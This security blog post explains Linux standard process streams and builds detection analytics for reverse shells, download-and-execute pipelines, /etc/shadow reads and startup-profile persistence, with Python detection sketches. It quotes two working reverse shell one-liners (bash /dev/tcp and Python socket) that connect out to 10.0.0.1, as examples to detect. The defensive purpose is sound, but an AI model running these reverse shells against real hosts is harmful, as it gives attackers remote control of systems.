How process streams can help you detect Linux threats

The Red Canary CIRT is always looking for creative new methods to detect threats, and much of that effort on Linux makes its way into our own Linux EDR sensor. One such method we’ve found useful is examining standard process streams. This blog will break down what process streams are, how they are required for basic shell functionality on Linux, and how you can leverage them to detect evil in your environment, along with some specific detection analytics we’ve had success with.

What are process streams?

Process streams refer to the various file-like handles that a process can read from and/or write to. They are a normal part of UNIX-based operating systems, like Linux, and are used for a wide variety of tasks, like cleaning up leftover Docker containers, searching through logs, and finding files with specific extensions:

$ docker ps -aq | xargs -I % docker rm -f %
$ cat /var/log/security | grep "failed" | sort | uniq -c
$ find . -name "*.ini" 2>/dev/null

On Linux, each process starts with three default streams open:

Default process stream	Corresponding hardware	Typical file descriptor
Standard Input (STDIN)	keyboard	`0`
Standard Output (STDOUT)	screen	`1`
Standard Error (STDERR)	screen	`2`

These streams can also be redirected to (or represent) other sources, such as text files, device drivers, and other processes. While these standard process streams are used by default, additional streams can be created using shell redirection in tools like Bash, library functions like fopen(), or system calls like open().

How do you find a process’s open streams?

The procfs filesystem exposes a ton of data about individual processes, including their open file descriptors, which are numeric identifiers associated with each open file handle for a process. Within procfs, we can find these descriptors as symbolic links under the /proc/$PID/fd/ directory, where $PID refers to the running process’s identifier and each link points to the descriptor’s destination.

Remember: STDIN has a file descriptor of 0, STDOUT has a file descriptor of 1, and STDERR has a file descriptor of 2.
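
As a rough illustration of reading those links, here is a minimal Python sketch. The function names read_fd_targets and describe_standard_streams are our own for this example, not part of any sensor or library, and the code assumes a Linux host with procfs mounted at /proc.

```python
import os
from typing import Dict, Union


def read_fd_targets(pid: Union[int, str] = "self") -> Dict[int, str]:
    """Return {fd number: link target} for one process by reading /proc/<pid>/fd."""
    fd_dir = f"/proc/{pid}/fd"
    targets = {}
    for entry in os.listdir(fd_dir):
        try:
            targets[int(entry)] = os.readlink(os.path.join(fd_dir, entry))
        except OSError:
            # The descriptor was closed between listdir() and readlink().
            continue
    return targets


def describe_standard_streams(fd_targets: Dict[int, str]) -> Dict[str, str]:
    """Label descriptors 0, 1, and 2 with their conventional stream names."""
    names = {0: "STDIN", 1: "STDOUT", 2: "STDERR"}
    return {names[fd]: target for fd, target in fd_targets.items() if fd in names}
```

Calling read_fd_targets() with no argument inspects the current process. Reading the descriptors of a process owned by another user typically requires elevated privileges.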

Additionally, the system utility List Open Files (lsof) can walk this directory for any given process, with the added benefit of displaying process names when a pipe is used. For instance, lsof can show that the processes cat and sleep are connected by the same pipe, such as pipe 347077.

How do adversaries use process streams?

Interactively spawning a process

Process streams are commonly used in interactive terminals—e.g., taking input from a keyboard and outputting data to a computer screen. Since STDIN and STDOUT are both concerned with hardware, these interactive processes use special devices in the /dev/ folder. For detection, we haven’t found a use case where the keyboard input is useful, but when STDOUT is pointing to a terminal device,* it’s a strong indication that the process was executed interactively, and we can use additional attributes to build robust detectors.

For example, rarely would anyone need to view the contents of the /etc/shadow file directly in an interactive terminal. This sensitive file contains password hashes of every user on the system, and if an adversary is able to dump its contents to the screen, they could attempt to crack those passwords offline after copying them to another system. To detect this, we can simply look for commands that reference /etc/shadow and have one or more standard streams pointing to a terminal device. Bonus: this works just as well inside containers, since the interactive terminal devices don’t change.

*On most Linux distributions, the terminal points to a device file with the pattern /dev/ttyN or /dev/pts/N, where N is the device ID.
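
The check described above could be sketched in Python roughly as follows. This is an illustration under our own assumptions, not a production analytic: the function names are hypothetical, the command line is assumed to arrive as a list of arguments, and the stream targets are assumed to be the link targets read from /proc/$PID/fd/.

```python
import re
from typing import Dict, List

# Terminal device patterns from the footnote: /dev/ttyN and /dev/pts/N.
TERMINAL_DEVICE = re.compile(r"^/dev/(tty\d+|pts/\d+)$")


def is_terminal(target: str) -> bool:
    """True when a descriptor's link target looks like a terminal device."""
    return bool(TERMINAL_DEVICE.match(target))


def shadow_read_on_terminal(cmdline: List[str], fd_targets: Dict[int, str]) -> bool:
    """True when the command references /etc/shadow and a standard stream is a terminal."""
    references_shadow = any("/etc/shadow" in arg for arg in cmdline)
    on_terminal = any(is_terminal(fd_targets.get(fd, "")) for fd in (0, 1, 2))
    return references_shadow and on_terminal
```

Because this uses a substring match, it also fires on neighboring files such as /etc/shadow-, which may or may not be what you want in your environment.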

Reverse shells

Reverse shells are an interesting use case for manipulating process streams as well, since there are a lot of examples on the internet with wildly varying syntax. This variation makes command-line detection difficult, but by focusing on the reverse shell’s process streams, we’re able to reliably detect a large number of variations. Let’s take a look at a few common examples from Pentest Monkey’s Reverse Shell Cheat Sheet:

$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

This example uses file descriptors for STDIN (0) and STDOUT (1) and some special shell syntax to redirect the streams back into each other, creating the reverse shell:

A network socket is opened by the current shell (the reverse shell’s parent) to the remote host using the bash-ism /dev/tcp/<IP>/<PORT>
The reverse shell’s STDOUT and STDERR are redirected to the remote host via the network socket (>&)
The reverse shell’s STDIN is redirected to the same place STDOUT was just directed, the network socket (0>&1)
Finally, an interactive shell is spawned as a child process with the existing streams and bash -i as the command line

Most of these steps happen as the result of special syntax interpreted by the existing shell process, so they do not get passed into the Linux kernel when the process is created. This can look pretty strange in most EDR sensors: usually it will just appear as a shell process with only bash -i as the command line and no other information.

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

While extremely similar to the previous one, this variation uses Python standard libraries instead of special bash syntax to open a network connection and set up the reverse shell:

The Python interpreter opens a network socket to the remote host using functions in the standard socket library
All three standard streams (STDIN/STDOUT/STDERR) are modified to reference the network socket with os.dup2()
Finally, an interactive shell spawns with the existing streams set up and /bin/sh -i as the command line

The basic workflow for this looks a lot like the first example, and the outcome is the same: a new reverse shell!
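
To see what these streams look like from the outside without opening any network connection, the following sketch starts a harmless child process whose three standard streams are one end of a local socket pair, then reads the child's descriptor links. The function name is our own, the child only sleeps, and the code assumes a Linux host with procfs mounted at /proc.

```python
import os
import socket
import subprocess
import sys
from typing import Dict


def spawn_with_socket_streams() -> Dict[int, str]:
    """Start a harmless child whose STDIN/STDOUT/STDERR are a local socket.

    Returns the link targets of the child's descriptors 0, 1, and 2.
    """
    # socketpair() creates two connected local sockets; nothing leaves the host.
    ours, theirs = socket.socketpair()
    child = subprocess.Popen(
        [sys.executable, "-c", "import time; time.sleep(5)"],
        stdin=theirs,
        stdout=theirs,
        stderr=theirs,
    )
    try:
        return {fd: os.readlink(f"/proc/{child.pid}/fd/{fd}") for fd in (0, 1, 2)}
    finally:
        # Clean up the child and both socket ends regardless of the outcome.
        child.kill()
        child.wait()
        ours.close()
        theirs.close()
```

Each returned link has the form socket:[<number>], and all three share the same number because they refer to the same socket. The child's command line, meanwhile, says nothing about a socket at all.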

Detection opportunity 1

The following detection logic can be used to detect most variations of reverse shells, regardless of whether they use Bash, Python, Java, or any other similar utility:

process_name == *sh
&&
standard_input == socket:[*]
&&
standard_output == socket:[*]

When examining processes using network sockets in this way, the process stream will take the format socket:[<number>] and link to the corresponding network socket; the number is the identifier for this socket.

Additional considerations for detection logic may include:

non-standard file descriptors being used
named pipes placed between a process and the network socket (commonly seen with variations on “netcat without the -e” reverse shells)
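
For readers who want to experiment, the logic in detection opportunity 1 could be expressed in Python along these lines. This is a sketch under our own assumptions: the function names are hypothetical, and fd_targets is assumed to map descriptor numbers to the link targets found under /proc/$PID/fd/.

```python
import re
from typing import Dict

# Link target format for a descriptor backed by a socket.
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def is_socket(target: str) -> bool:
    """True when a descriptor's link target has the form socket:[<number>]."""
    return bool(SOCKET_LINK.match(target))


def looks_like_reverse_shell(process_name: str, fd_targets: Dict[int, str]) -> bool:
    """process_name == *sh && standard_input == socket:[*] && standard_output == socket:[*]"""
    return (
        process_name.endswith("sh")
        and is_socket(fd_targets.get(0, ""))
        and is_socket(fd_targets.get(1, ""))
    )
```

Note that the *sh pattern also matches names such as ssh, so some tuning of the process name condition may be needed. This sketch also does not cover the two considerations listed above (non-standard descriptors and intermediate named pipes).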

Malicious script download and execution without touching disk

A common method of evading detection involves downloading malicious scripts and piping them directly into a shell to execute. This tactic avoids writing anything to disk, where a good antivirus can detect and remediate a threat before a foothold can be established. In our experience, this tactic is most commonly used by groups attempting to deploy cryptominers (because of course).

Every version of this attack pattern we’ve seen goes something like:

A system binary is used to download the shell script from a remote host—most often curl or wget
The downloader then pipes its output to a shell via STDOUT
The shell reads the malicious script from STDIN and executes commands accordingly

Since the downloader process is piping directly into the shell, its STDOUT will align with the shell’s STDIN. Even when additional processes are placed between the download and execution of the shell script, this chain of STDIN/STDOUT can be followed to understand how malicious commands are being processed, such as when the malicious script needs to be Base64 decoded before execution.

Detection opportunity 2

A detection analytic for this technique is fairly straightforward, but data collection may pose a problem. Unfortunately, no single telemetry source correlates the reader and writer of a pipe. That data is scattered across the /proc/ filesystem, including an individual process’s file descriptors (/proc/$PID/fd/) and the global network connection files (e.g., /proc/net/tcp). With that data in hand, the analytic looks like this:

process_name == *sh
&&
standard_input == pipe:[*]
&&
(standard_input_process == curl || standard_input_process == wget)

Detection opportunity 3

Or, to catch variations where Base64 encoding is used, focus on base64 and examine both its STDIN and STDOUT pipes simultaneously:

process_name == base64
&&
standard_input == pipe:[*]
&&
(standard_input_process == curl || standard_input_process == wget)
&&
standard_output == pipe:[*]
&&
standard_output_process == *sh

Like the sockets in the previous example, the process stream will take the format pipe:[<number>] and use the ID of the corresponding unnamed pipe as the number. Additional effort is required to resolve the process on the other end of that pipe.
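
One way to do that resolution is to collect the descriptor links for every process and match pipe IDs across them. The Python sketch below works on a hypothetical snapshot structure of our own design, {pid: {"name": ..., "fds": {fd: link target}}}, which we assume could be built from /proc/$PID/comm and /proc/$PID/fd/. It then applies detection opportunities 2 and 3 to that snapshot.

```python
import re
from typing import Dict, List

PIPE_LINK = re.compile(r"^pipe:\[\d+\]$")
DOWNLOADERS = {"curl", "wget"}

# Hypothetical snapshot shape: {pid: {"name": str, "fds": {fd number: link target}}}
Snapshot = Dict[int, dict]


def pipe_peers(snapshot: Snapshot, pid: int, fd: int, peer_fd: int) -> List[str]:
    """Names of other processes whose <peer_fd> is the same pipe as <pid>'s <fd>."""
    target = snapshot[pid]["fds"].get(fd, "")
    if not PIPE_LINK.match(target):
        return []
    return [
        proc["name"]
        for other_pid, proc in snapshot.items()
        if other_pid != pid and proc["fds"].get(peer_fd) == target
    ]


def download_piped_to_shell(snapshot: Snapshot, pid: int) -> bool:
    """Detection opportunity 2: a shell whose STDIN pipe is fed by curl or wget."""
    if not snapshot[pid]["name"].endswith("sh"):
        return False
    # A writer's STDOUT (1) is the same pipe as this process's STDIN (0).
    return any(name in DOWNLOADERS for name in pipe_peers(snapshot, pid, 0, 1))


def encoded_download_piped_to_shell(snapshot: Snapshot, pid: int) -> bool:
    """Detection opportunity 3: base64 sitting between a downloader and a shell."""
    if snapshot[pid]["name"] != "base64":
        return False
    writers = pipe_peers(snapshot, pid, 0, 1)  # who feeds base64's STDIN
    readers = pipe_peers(snapshot, pid, 1, 0)  # who reads base64's STDOUT
    return any(w in DOWNLOADERS for w in writers) and any(
        r.endswith("sh") for r in readers
    )
```

The sketch only matches peers on their own STDIN or STDOUT, mirroring the pipelines described above. A process that holds the pipe on a different descriptor would need a broader search.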

You should also consider the following when writing detection logic:

Scheduling services such as crond or atd initiating these commands
The user account associated with these processes. This activity may be normal for a developer account, but a webserver user like www-data probably should not be performing it.

Appending a command to a startup profile

Lastly, many locations on Linux systems store scripts designed to execute commands based on some predefined event, such as system startup, a user logging in, or a specific time elapsing. Many malware families have used these locations to persist on systems by appending to existing scripts, which helps avoid suspicion from curious administrators.

Detection opportunity 4

Often when we see this activity, it takes the form of shell commands echoing data directly to a file. System services, such as cron or web servers, will leverage the Bourne shell to execute commands as child processes using the sh -c syntax with a redirection to the intended startup profile. When this happens, the shell executes the command with its STDOUT stream pointing at the startup profile, which is what the following detection analytic looks for:

process_name == sh
&&
(standard_output == /etc/rc.d/* || standard_output == /etc/rc.local ||
standard_output == .*rc || standard_output == .*profile)

Just a handful of common startup locations are used above, but there are many possible locations depending on what software is installed, what subsystems are used, etc. Surveying your environment ahead of time can help you understand which profiles are likely to be present on a given host.
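
As a rough sketch, detection opportunity 4 could be written in Python like this. The function name is hypothetical, and we are assuming that the .*rc and .*profile patterns mean "any path whose file name ends in rc or profile"; adjust that interpretation to match your own sensor's pattern syntax.

```python
import os


def writes_to_startup_profile(process_name: str, stdout_target: str) -> bool:
    """True when sh has STDOUT pointing at one of the startup locations above."""
    if process_name != "sh":
        return False
    if stdout_target.startswith("/etc/rc.d/") or stdout_target == "/etc/rc.local":
        return True
    # Assumed reading of ".*rc" and ".*profile": file names ending in rc or profile.
    file_name = os.path.basename(stdout_target)
    return file_name.endswith("rc") or file_name.endswith("profile")
```

For example, an sh process whose STDOUT link is /home/alice/.bashrc would match, while one writing to a terminal or a pipe would not.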

Now streaming

Process streams are another building block of endpoint detection. On UNIX-based operating systems, every process starts with three standard streams that can be used in conjunction with other attributes to build robust detections. Many common attack techniques use them without even intending to, and, though it is possible for adversaries using process streams to evade scrutiny, doing so is much more difficult than evading other artifacts used for detection, such as command lines or process names.

Thomas Gardner
